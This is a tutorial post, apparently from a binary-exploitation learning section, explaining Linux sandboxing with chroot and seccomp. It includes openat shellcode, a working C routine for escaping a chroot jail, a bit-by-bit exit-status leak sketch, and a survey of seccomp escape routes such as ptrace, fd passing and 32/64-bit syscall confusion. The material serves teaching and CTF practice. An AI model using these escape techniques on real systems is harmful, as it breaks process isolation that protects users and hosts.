Sandboxing - Chroot & Seccomp

Created On 06. Jun 2021

Updated: 2021-06-06 02:07:24.950305000 +0000

Created By: acidghost

Sandboxing refers to the isolation of processes from one another on a system. In the early days (back in the 1980s), hardware was developed specifically to separate processes in a computer's memory. Later the concept was applied to isolating environments in programming, for example separating an interpreter from the code it interprets.
Web browsers are one of the biggest targets for malicious hackers. Victims are usually routed through the browser to a malicious web page, where vulnerabilities are exploited to infect the machine. A web browser has to keep pace with rapidly evolving web technology. Today browsers can do almost everything: stream video, run games, play music and so on. Adobe Flash was one of the classic malware vectors, and it wasn't the only technology killed off in the hope of reducing the number of vulnerabilities. However, those technologies aren't the only ones with vulnerabilities: JavaScript engines, libraries and codecs can all be exploited. Nowadays browsers also apply sandboxing, restricting the privileges of the child processes they create. Sandboxing has evolved a lot since the Adobe Flash days, and exploiting such processes is no longer a matter of one-liners. With a sandbox in place, exploitation requires a chain of vulnerabilities: first the sandboxed process has to be exploited, and then the attacker has to break out of the sandbox.

Chroot

Chroot is a sandboxing utility on Linux, and it requires root privileges to run. It was the sandboxing utility back in 1979, when it first appeared in Unix. However, it was never meant to be used as a security measure.

  • chroot() changes the meaning of '/' for a process and its children.

For example, when trying to run a file in the jail directory, calling chroot like this: chroot /tmp/jail /tmp/jail/file will try to execute /tmp/jail/tmp/jail/file, a path that doesn't exist. For the jailed process, "/" refers to /tmp/jail/, so the correct command is chroot /tmp/jail/ /file.

  • chroot("/tmp/jail") will disallow processes from getting out of the jail

However, this only holds once the process is actually inside the jail. While the working directory is still outside /tmp/jail, the jail is not in effect for relative paths; it takes effect as soon as the process changes (cd) into the jail directory. In other words, the restriction on .. applies only within the jail.

  • doesn't have any syscall filtering

By triggering certain syscalls, it is possible to break out of the jail. Alongside the open (int open(const char *pathname, int flags);) and execve syscalls, there are also openat (int openat(int dirfd, const char *pathname, int flags);) and execveat. The int dirfd argument can be a file descriptor that represents any open directory, even one outside of the jail, or the special value AT_FDCWD. As shellcode this would start like this:

.global _start
.intel_syntax noprefix
_start:
        mov rax, 257          # syscall number for openat
        mov rdi, 3            # dirfd that was opened outside of the jail
        lea rsi, [rip+path]   # the path, resolved relative to dirfd
        mov rdx, 0            # O_RDONLY (read-only)
        syscall

Executing this however will not change the current working directory.
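The same idea can be sketched in C. This is only an illustration, assuming some directory descriptor was left open before the process was jailed; the helper name read_relative_to is made up for this example and is not part of any library.

```c
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: read up to len-1 bytes of `name`, resolved
 * relative to the directory behind dirfd instead of relative to "/"
 * or the current working directory.
 * Returns the number of bytes read, or -1 on error. */
ssize_t read_relative_to(int dirfd, const char *name, char *buf, size_t len)
{
    if (len == 0)
        return -1;

    /* openat() starts the lookup at dirfd, wherever that directory is */
    int fd = openat(dirfd, name, O_RDONLY);
    if (fd < 0)
        return -1;

    ssize_t n = read(fd, buf, len - 1);
    close(fd);
    if (n >= 0)
        buf[n] = '\0';   /* keep the result usable as a C string */
    return n;
}
```

Inside a jail, passing a descriptor that still points at a directory outside of it (the shellcode above assumes descriptor 3) would make the lookup start outside the jail.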

chroot("/tmp/jail") will not:
  • close resources that reside outside of the jail
  • cd (chdir()) into the jail
  • do anything else

A small program that calls chroot and then moves into that directory:

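#include <unistd.h>

int main()
{
	chroot("/tmp/jail");	// change the root directory (requires root)
	chdir("/");		// move the working directory into the new root
	return 0;
}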

Escaping from chroot

The kernel does not keep any memory of previous chroots for a process. This can be used to escape! The syscall number for chroot on 64-bit systems is 161 and it takes one argument in rdi :wink:. Also, as mentioned above, it is possible to open directories outside of the jail through the int dirfd argument of syscall 257 (openat).
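A minimal sketch of the classic escape that follows from this, assuming the jailed process still runs with an effective UID of 0. The function name escape_chroot and the scratch directory name escape_tmp are made up for this example.

```c
#include <errno.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: try to leave a chroot jail.
 * Returns 0 on success, -1 on failure (for example when not root). */
int escape_chroot(void)
{
    /* 1. create a scratch directory inside the current jail */
    if (mkdir("escape_tmp", 0755) != 0 && errno != EEXIST)
        return -1;

    /* 2. chroot into it WITHOUT changing directory: the old root is
     *    forgotten and the working directory is now outside the new root */
    if (chroot("escape_tmp") != 0)
        return -1;

    /* 3. walk upwards; ".." is only stopped at the current root,
     *    which the working directory is no longer beneath */
    for (int i = 0; i < 64; i++) {
        if (chdir("..") != 0)
            return -1;
    }

    /* 4. make the directory we ended up in (the real "/") the root */
    return chroot(".");
}
```

The loop count of 64 is an arbitrary upper bound on directory depth; extra chdir("..") calls at the real root are harmless.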

Is chroot safe?

Any user with an eUID of 0 can always break out of a chroot if the chroot syscall is not blocked. Other isolation that chroot does not provide:

  • PID - chrooted processes keep the same global PIDs as every other process
  • network - network access is not isolated, for example when running netcat or opening a website in a browser
  • IPC - memory can still be shared between processes

Some Practice

Here are some scripts (compiled from here) that can be run one after another with the corresponding arguments to set up a chroot jail plus a user that can then ssh straight into it. Escaping from the jail can be tried out on this example.

Chroot is still used in many systems, although its popularity has gone down. Other sandboxing utilities are cgroups, namespaces and seccomp.

Seccomp

Seccomp provides kernel-level sandboxing that can be used to filter system calls. Its rules are inherited by child processes. See more here https://man7.org/linux/man-pages/man3/seccomp_reset.3.html. While seccomp policies can get very complex, setting up a sandbox can be as simple as the following:

#include <seccomp.h>
#include <unistd.h>

int main(int argc, char **argv)
{
	// create a seccomp filter context
	scmp_filter_ctx ctx;
	// allow any system call (init default policy)
	ctx = seccomp_init(SCMP_ACT_ALLOW);
	// add a rule with the kill action for the read syscall
	seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(read), 0);
	// apply the filter
	seccomp_load(ctx);

	// the filter stays in place across execve, so cat runs under the same policy
	execl("/bin/cat", "cat", "/flag", (char *)0);
}

Compile it like this:

gcc -o seccomp seccomp.c -lseccomp

If it doesn't work, install the seccomp library with sudo apt install libseccomp-dev. Now run it under strace and see how far cat gets toward printing /flag before the filter kills it.

Seccomp builds on the kernel's Berkeley Packet Filter (BPF) functionality. Extended BPF (eBPF) programs run in an in-kernel, "provably safe" virtual machine and can instrument the kernel in many ways, for example to filter network traffic (iptables) or to implement system-wide syscall tracing https://github.com/iovisor/bcc. Seccomp filters themselves are written as classic BPF programs.

BPF is used with seccomp() to apply syscall filters to processes.
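To make the BPF connection concrete, here is a small sketch that installs a hand-written filter through prctl() instead of libseccomp. The choice of getppid as the denied syscall and both function names are assumptions made for this illustration only. The filter is installed in a forked child so the calling process stays unfiltered.

```c
#include <errno.h>
#include <stddef.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

/* Install a filter that makes getppid() fail with EPERM and allows
 * everything else. A production filter would also check the arch
 * field of struct seccomp_data before looking at the number. */
static int deny_getppid(void)
{
    struct sock_filter insns[] = {
        /* load the syscall number */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        /* nr == getppid ? continue with next insn : skip one insn */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_getppid, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = sizeof(insns) / sizeof(insns[0]),
        .filter = insns,
    };

    /* required for unprivileged processes before installing a filter */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

/* Fork a child, install the filter there and report what it saw:
 * 0 = getppid was rejected with EPERM, 1 = it was not rejected,
 * 2 = the filter could not be installed, -1 = fork/wait failed. */
int getppid_denied_in_child(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (deny_getppid() != 0)
            _exit(2);
        errno = 0;
        long r = syscall(SYS_getppid);
        _exit((r == -1 && errno == EPERM) ? 0 : 1);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

libseccomp generates a program of this kind from the rules added with seccomp_rule_add(), which is why the library version is so much shorter.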

Escaping Seccomp

Seccomp is a very modern solution to sandboxing (as of the time this post was written), and escaping from it is nowhere near as easy as escaping from chroot. Many applications we use daily rely on it, including Docker, Firefox and Google Chrome. See more sandbox exploits discovered in Chrome here https://github.com/allpaca/chrome-sbx-db. However, because all these applications must fulfil basic needs such as interacting with the user, many holes open up in seccomp security.
To break out of seccomp it is necessary that the sandboxed process can communicate with the privileged process. This is the first weakness that has to be exploited when escaping. To communicate with the privileged process, the sandboxed process has to use system calls. This alone opens up a lot of attack vectors, including permissive policies, syscall confusion and kernel vulnerabilities in the syscall handlers.

  • Permissive Policies

Vulnerabilities in permissive policies arise from combinations of allowed functionality: what the policy intends to permit can interact in unexpected ways with the syscalls that remain available. The number of syscalls is enormous, as mentioned in shellcoding, and new ones keep being added with every Linux version.
An example: a permitted ptrace() system call could let a sandboxed process 'puppet' a non-sandboxed process. ptrace() is the syscall behind Linux's debugging functionality. With it a process can monitor another's execution, change its memory, instruction pointer and registers, inject shellcode etc.
Other effects:

  • sendmsg() can transfer file descriptors between processes
  • prctl() has bizarre possible effects
  • process_vm_writev() allows direct access to another process's memory

Taking only these few things into consideration, it is natural that keeping track of everything the allowed syscalls can do may become impossible, and that is where mistakes lead to security issues.
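As an illustration of the sendmsg() point, the sketch below passes a file descriptor over a Unix-domain socket using an SCM_RIGHTS control message. The helper names send_fd and recv_fd are made up for this example; the pattern follows the one documented in cmsg(3).

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Buffer for one control message carrying a single int, suitably aligned. */
union fd_ctrl {
    struct cmsghdr align;
    char buf[CMSG_SPACE(sizeof(int))];
};

/* Send descriptor fd over the Unix-domain socket sock. 0 on success. */
int send_fd(int sock, int fd)
{
    char byte = 'F';                       /* at least one data byte is sent */
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union fd_ctrl ctrl;
    struct msghdr msg;

    memset(&ctrl, 0, sizeof ctrl);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof ctrl.buf;

    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type = SCM_RIGHTS;             /* "this message carries fds" */
    c->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(c), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive a descriptor from sock. Returns the new fd, or -1 on error. */
int recv_fd(int sock)
{
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union fd_ctrl ctrl;
    struct msghdr msg;

    memset(&ctrl, 0, sizeof ctrl);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof ctrl.buf;

    if (recvmsg(sock, &msg, 0) != 1)
        return -1;

    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    if (c == NULL || c->cmsg_level != SOL_SOCKET || c->cmsg_type != SCM_RIGHTS)
        return -1;

    int fd;
    memcpy(&fd, CMSG_DATA(c), sizeof(int));
    return fd;
}
```

If a policy allows sendmsg() and recvmsg() on such a socket, a process outside the sandbox can hand the sandboxed one a descriptor for a file it could never have opened itself.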

  • Syscall Confusion

As mentioned in Assembly References, many 64-bit architectures are backwards compatible with their 32-bit predecessors. Interestingly enough, however, the syscall numbers for the two are completely different. One thing that is sometimes omitted from seccomp policies is filtering for both the 64-bit and the 32-bit syscalls.
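The mismatch can be illustrated with a small lookup table of syscall numbers for x86-64 and 32-bit x86. This is a toy model, not a real filter: the table covers only a handful of syscalls, and naive_blocks stands in for a hypothetical policy that compares the number alone.

```c
#include <stddef.h>

enum abi { ABI_X86_64, ABI_I386 };

struct sys_entry {
    const char *name;
    int nr_x86_64;
    int nr_i386;
};

/* A few syscall numbers as they appear on each ABI. */
static const struct sys_entry sys_table[] = {
    { "read",     0,   3 },
    { "write",    1,   4 },
    { "open",     2,   5 },
    { "execve",  59,  11 },
    { "chroot", 161,  61 },
    { "openat", 257, 295 },
};

/* Name of syscall `nr` under the given ABI, or NULL if not in the table. */
const char *syscall_name(enum abi abi, int nr)
{
    for (size_t i = 0; i < sizeof(sys_table) / sizeof(sys_table[0]); i++) {
        int candidate = (abi == ABI_X86_64) ? sys_table[i].nr_x86_64
                                            : sys_table[i].nr_i386;
        if (candidate == nr)
            return sys_table[i].name;
    }
    return NULL;
}

/* Hypothetical naive policy: block "execve" by its x86-64 number only. */
int naive_blocks(int nr)
{
    return nr == 59;
}
```

Under this model a 32-bit execve arrives as number 11 and passes the naive check. Real filters guard against this by checking the arch field of struct seccomp_data before looking at the number.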

  • Kernel Vulnerabilities

Even if the policy leaves us nothing useful to do, it is still possible to interact with the syscalls that are allowed, and a kernel bug in the handler of one of them is enough!

  • 1 bit signals

This is a very spectacular way of exfiltrating data, where single bits are checked through error messages to identify the correct value. In the future I will write a few parts describing how to apply this not only to escape sandboxes but also to decode different cryptographic hashes! Stay tuned! :wink:
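The post does not spell out the mechanism, so the following is only one possible reading: a process that can do nothing but exit still reveals one bit per run through its exit status. The function names and the use of fork() to model the sandboxed process are assumptions made for this sketch.

```c
#include <stddef.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs in the "sandboxed" child: reveal one bit of the secret through
 * the exit status (0 or 1), the only channel assumed to be available. */
static void leak_bit(const char *secret, size_t bit_index)
{
    unsigned char byte = (unsigned char)secret[bit_index / 8];
    _exit((byte >> (bit_index % 8)) & 1);
}

/* Observer: rebuild len bytes of the secret, one child and one bit at
 * a time. Returns 0 on success, -1 on failure. */
int recover_secret(const char *secret, char *out, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        unsigned char byte = 0;
        for (size_t b = 0; b < 8; b++) {
            pid_t pid = fork();
            if (pid < 0)
                return -1;
            if (pid == 0)
                leak_bit(secret, i * 8 + b);   /* never returns */

            int status;
            if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
                return -1;
            byte |= (unsigned char)(WEXITSTATUS(status) << b);
        }
        out[i] = (char)byte;
    }
    return 0;
}
```

The same pattern works with any observable yes/no outcome, such as crashing versus exiting cleanly, in place of the exit status.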

References

https://pwn.college/modules/sandbox

Section: Binary Exploitation (PWN)
